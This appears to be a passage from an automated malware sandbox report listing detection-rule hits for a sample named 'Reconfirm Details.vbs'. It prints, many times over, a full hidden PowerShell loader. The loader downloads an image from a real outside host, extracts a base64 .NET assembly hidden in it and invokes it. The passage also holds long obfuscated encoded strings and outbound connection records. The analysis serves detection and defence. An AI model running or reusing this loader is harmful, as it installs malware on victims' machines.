TreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandL
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6728, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                      Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 149.154.167.220, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 5684, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49710
                      Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", ProcessId: 6728, ProcessName: wscript.exe
                      Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg
                      Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 104.21.84.67, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 6728, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49704
                      Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandL
                      Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandL
                      Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Reconfirm Details.vbs", ProcessId: 6728, ProcessName: wscript.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDg

                      Data Obfuscation

                      barindex
                      Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.noh/ba/moc.ocsnoshm//:sptth' , 'desativado' , 'desativado' , 'desativado','MSBuild',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029', 'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; 